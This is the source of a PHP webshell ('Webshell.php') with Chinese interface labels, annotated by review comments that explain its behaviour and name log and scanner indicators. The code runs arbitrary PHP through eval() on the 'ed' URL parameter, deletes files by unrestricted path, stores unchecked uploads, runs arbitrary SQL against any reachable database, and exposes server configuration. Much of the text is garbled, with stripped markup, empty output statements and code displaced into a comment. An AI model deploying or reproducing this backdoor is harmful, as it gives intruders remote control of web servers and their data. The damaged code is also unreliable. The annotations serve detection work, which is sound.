Webshell.php '; //这下面$downfile,$delfile,$refilname,$editfile 4个变量是触发下面三个条件语句的变量,值得获取是通过Url取得的。 $downfile=$_GET["downfile"]; $delfile = $_GET["delfile"]; $refilename = $_GET["re
';
// The four variables below ($downfile, $delfile, $refilename, $editfile) select
// which of the conditional branches that follow will run; their values are read
// from the URL.
// NOTE(review): all four are copied from the query string, and no authentication
// check, allow-list or directory restriction is visible in this copy. Requests
// carrying the downfile, delfile, refilename, editfile or ed parameters are
// therefore useful access-log indicators when hunting for this file.
$downfile=$_GET["downfile"];
$delfile = $_GET["delfile"];
$refilename = $_GET["refilename"];
$editfile = $_GET["editfile"];
// NOTE(review): as listed, everything from the comment opener below to the
// print_r($_SERVER) call is one block comment and is not executed. It looks like
// the bodies of the rename and edit branches were displaced into this span when
// the page markup was stripped -- confirm against an intact sample before relying
// on it. What the displaced text shows: rename() takes its source from
// basename($refilename) and its target from the POST field newname unchanged;
// the edit branch opens basename($editfile) for reading or, when the POST field
// newcontent is set, truncates it with w+ and writes that field into it. Both
// names are relative, so they resolve against the working directory of the script.
/*echo ''; echo ''; echo ' '; echo ' '; echo '';
echo 'Enter the newname to here:';
echo ''; echo ''; echo ' ';echo '';echo ' ';
$oldname=basename($refilename);
# rename: file function, used to operate on files
if (@rename($oldname,$_POST['newname'])){ echo '';}
else { if (!empty($_POST['newname'])) echo '';}
}
// Edit a file
if ($editfile) {
$content=basename($editfile);
if(empty($_POST['newcontent'])){
echo ' '; echo ''; echo ''; echo ' ';
$fp=@fopen("$content","r"); # fopen, fread, filesize, fclose, fwrite: filesystem functions, used to operate on files
$data=@fread($fp,filesize($content));
echo ' '; echo ' ';
}
if (!empty($_POST['newcontent'])) {
$fp=@fopen("$content","w+");
echo ($result=@fwrite($fp,$_POST['newcontent']))?"The injection document succeeds!Good Luck!":"The injection document is defeated!";
@fclose($fp);
}
}
echo ''; ?>'; print_r($_SERVER);*/
// Download branch: runs when the downfile parameter is non-empty.
// NOTE(review): only response headers are set in the visible code; no call that
// sends the file body appears in this copy, although the original comment names
// readfile. The file name placed in the headers is basename($downfile).
if (!empty($downfile)) {
    #@set_time_limit(600); #Limits the maximum execution time
    $filename = basename($downfile); # basename, filesize, readfile: file functions, used to operate on files
    header("Content-Type: application/force-download; name=".$filename); # Build the HTTP headers for a download.
    header("Content-Transfer-Encoding: binary");
    header("Content-Disposition: attachment; filename=".$filename);
    header("Expires: 0");
    header("Cache-Control: no-cache, must-revalidate");
    header("Pragma: no-cache");
}
// NOTE(review): the ed request parameter is passed to eval(), so anyone who can
// reach this URL can run PHP code with the privileges of the web server process.
// htmlspecialchars() is an HTML output-encoding function and does not make the
// value safe to evaluate. eval() on a value taken from $_GET, together with the
// error-suppression operator, is a strong static indicator for file scanners.
if(!empty($_GET['ed'])) {
    @$str = htmlspecialchars($_GET['ed']);
    echo '';
    eval(@$str);
}
// Delete a file
// NOTE(review): $delfile reaches is_file() and unlink() exactly as received (no
// basename() here, unlike the download branch), so the path is not confined to
// one directory. The result message echoes $delfile without HTML escaping.
if($delfile!=""){
    if(is_file($delfile)){ # is_file, unlink: file functions, used to operate on files
        $message = (@unlink($delfile)) ? "The deletion document succeeds!`$delfile` Already deleted!" : "The deletion document is defeated!`$delfile` The document exists!" ;
    }else{
        $message = "File `$delfile` does not exist!";
    }
    echo $message;
}
// Rename a file
if ($refilename){ echo '
'; echo '
操作系统: 服务器名称: Server IP: Server time: Server port :
『PHP探针模块』 『目录浏览模块[快速]』 『命令执行模块』 『数据库操作模块』 『字符转换模块』
Home dir:" rel="nofollow" target="_blank"> Current dir of contents: ".$dir.""; } else { echo "".$dir.""; } ?> $file_size_max) { echo "兄弟!换个小点滴!!
"; exit; }
// NOTE(review): upload handler. The start of this branch is damaged in this copy:
// the assignments of $store_dir, $upload_file, $upload_file_name, $file_size_max
// and $accept_overwrite are not visible, and only the tail of a size comparison
// against $file_size_max survives above.
// Refuse to replace an existing file unless $accept_overwrite is set (the message
// reads: file already exists). The backslash separator suggests the script was
// written for a Windows host -- TODO confirm.
if (file_exists($store_dir ."\\". $upload_file_name) && !$accept_overwrite) {
    Echo "文件已存在!";
    exit;
}
// NOTE(review): no extension, MIME-type or content check is visible between the
// size test and move_uploaded_file(), so the stored file keeps whatever name is
// in $upload_file_name. New or changed script files inside web-served, writable
// directories are the artefact to monitor for (file-integrity monitoring, and
// denying script execution in upload directories). The message reads: upload failed.
if (!move_uploaded_file($upload_file,$store_dir."\\".$upload_file_name)) {
    echo "上传文件失败!";
    exit;
}
// Report the client-supplied name and size of the upload. Both come from $_FILES
// and are echoed without HTML escaping.
Echo "
Uploaded file:"; echo "".$_FILES['upload_file']['name'].""; echo "\t";
Echo "Uploadfilesiza:"; echo "".$_FILES['upload_file']['size']." Bytes"; echo "\t";
Echo "Sucessful...";
}
echo '
'; echo ''; echo ' '; ?> 当前目录可写!^ _ ^"; } else{ $dir_wriable='目录不可写'; echo "当前目录不可写!"; }
// NOTE(review): the line above is the damaged tail of a directory-writable check;
// its condition is not visible in this copy. The two messages read: current
// directory is writable / current directory is not writable.
/**
 * Turn a flag into the label printed in the report below.
 *
 * The comparison is loose (==), so boolean true and the string 1 both count as set.
 *
 * @param mixed $xy7 Value to test against 1.
 * @return string YES√ when $xy7 == 1, otherwise NO×.
 */
function getinfo($xy7) {
    if($xy7==1) { $s='YES√'; } else { $s='NO×'; }
    return $s;
}
echo '';
// NOTE(review): environment report. The statements from here to the end of the
// block print, to whoever requests the page: operating system, server name and
// port, server time, the address SERVER_NAME resolves to, server software, PHP
// SAPI, PHP and Zend versions, the absolute path of this file, free disk space,
// several php.ini values (memory_limit, upload_max_filesize, disable_functions,
// post_max_size, max_execution_time, enable_dl, register_globals, display_errors,
// safe_mode, allow_url_fopen) and whether session, socket, MySQL, MSSQL, ODBC,
// Oracle and SNMP functions exist. The Chinese labels are runtime output and are
// left exactly as written.
echo "服务器系统:" ; echo PHP_OS; echo '
' ; echo "服务器域名:"; echo $_SERVER['SERVER_NAME']; echo '
'; echo "WEB服务器端口:"; echo $_SERVER['SERVER_PORT']; echo '
'; echo "服务器时间:"; echo date("Y年m月d日 h:i:s",time()); echo '
'; echo "服务器IP地址:"; echo gethostbyname($_SERVER['SERVER_NAME']); echo '
';
// NOTE(review): the label reads: server OS text encoding, but the value printed is
// the Accept-Language header of the incoming request. It is client-controlled
// and echoed without HTML escaping.
echo "服务器操作系统文字编码:"; echo $_SERVER['HTTP_ACCEPT_LANGUAGE']; echo '
'; echo "服务器解释引擎:"; echo $_SERVER['SERVER_SOFTWARE']; echo '
'; echo "PHP运行方式:"; echo strtoupper(php_sapi_name()); echo '
'; echo "PHP版本:"; echo PHP_VERSION; echo '
'; echo "ZEND版本:"; echo zend_version(); echo '
'; echo "本文件绝对路径:"; echo __FILE__; echo '
'; echo "服务器剩余空间:"; echo intval(diskfreespace(".") / (1024 * 1024)).'MB'; echo '
'; echo "脚本运行可占最大内存:"; echo get_cfg_var("memory_limit"); echo '
'; echo "脚本上传文件大小限制:"; echo get_cfg_var("upload_max_filesize"); echo '
';
// The label reads: blocked functions. Printing disable_functions tells the viewer
// which PHP functions the host has switched off.
echo "被屏蔽函数:"; echo get_cfg_var("disable_functions"); echo '
'; echo "POST方法提交限制:"; echo get_cfg_var("post_max_size"); echo '
'; echo "脚本超时时间:"; echo get_cfg_var("max_execution_time")."秒"; echo '
'; echo "动态链接库:"; echo getinfo(get_cfg_var("enable_dl")); echo '
'; echo "自定义全局变量:"; echo getinfo(get_cfg_var("register_globals")); echo '
'; echo "显示错误信息:"; echo getinfo(get_cfg_var("display_errors")); echo '
'; echo "PHP安全模式:"; echo getinfo(get_cfg_var("safe_mode")); echo '
';
// NOTE(review): the label reads: FTP file transfer, but the call is
// get_magic_quotes_gpc(), which reports the magic-quotes setting and takes no
// argument, so this row does not test FTP support. The function was removed in
// PHP 8, which dates the code.
echo "FTP文件传输:"; echo getinfo(get_magic_quotes_gpc("FTP support")); echo '
'; echo"允许使用URL打开文件:"; echo getinfo(get_cfg_var("allow_url_fopen")); echo '
'; echo "SESSION支持:"; echo getinfo(function_exists("session_start")); echo '
'; echo "Socket支持:"; echo getinfo(function_exists("fsockopen")); echo '
'; echo "MYSQL数据库:"; echo getinfo(function_exists("mysql_close")); echo '
'; echo "SQL SERVER数据库:"; echo getinfo(function_exists("mssql_close")); echo '
'; echo "ODBC数据库:"; echo getinfo(function_exists("odbc_close")); echo '
'; echo "Oracle数据库:"; echo getinfo(function_exists("ora_close")); echo '
'; echo "SNMP协议:"; echo getinfo(function_exists("snmpget")); echo '
'; echo '
'; }
// NOTE(review): the shell query parameter selects the module. The values visible
// in this chain are checkdir, command, change and sql; requests carrying them are
// access-log indicators for this file. Most of the markup each branch printed
// was stripped from this copy, so several echo statements are now empty.
// checkdir: only a global declaration and an echo are visible here.
elseif ($_GET['shell']=="checkdir"){
    global $PHP_SELF;
    echo ' ';
}
// command: only the form label survives in this copy; the code that would act on
// the submitted value is not shown here.
elseif ($_GET['shell']=="command"){ echo '
'; echo ' '; echo ''; echo ' '; echo ' ';
    echo 'Enter your command:';
    echo ''; echo ''; echo ' ';echo ''; echo ' '; echo ' '; echo '';
}
elseif ($_GET['shell']=="change"){
    echo ' '; echo '';
}
// MySQL operations
elseif ($_GET['shell']=="sql"){ echo 'The database connects successfully!
".mysql_error()."
Execution successfully!The request makes a mistake:".mysql_error()." '; echo ' '; echo ' ';
    // NOTE(review): the status texts inside the string above appear to have been
    // displaced from the empty echo statements further down when the markup
    // was stripped -- confirm against an intact sample.
    echo "Username:"; echo ''; echo ' '; echo ' ';
    echo "Password:"; echo ''; echo ' ';
    echo "DBname:"; echo ''; echo ' ';
    // NOTE(review): host, user, password and database name are taken from the POST
    // body, so this branch can connect to any database server reachable from the
    // web host. The mysql_* functions belong to the legacy mysql extension, which
    // was removed in PHP 7.0. Outbound database connections from the web tier
    // to unexpected hosts are worth alerting on.
    $servername = $_POST['servername'];
    $username = $_POST['username'];
    $password = $_POST['password'];
    $dbname = $_POST['dbname'];
    if ($link=@mysql_connect($servername,$username,$password) and @mysql_select_db($dbname)) {
        echo ""; echo "";
        //mysql_close();
    } else {
        echo ""; echo "";
    }
    // NOTE(review): the POST field query is handed to mysql_query() unchanged, and
    // $dbresult is then reused to hold the result. mysql_close() is called only
    // inside this branch, so the link is left open when no query is submitted.
    $dbresult = $_POST['query'];
    if (!empty($dbresult)){
        $dbresult = @mysql_query($dbresult);
        echo ($dbresult) ? "" : " ".""; mysql_close();
    }
    echo ' '; echo ''; echo ' '; echo ' '; echo ''; echo ' '; echo ' ';
    // The output of this branch was stripped; what it printed for the url
    // parameter cannot be told from this copy.
    if(!empty($_GET['url'])) { echo ''; }
} ?>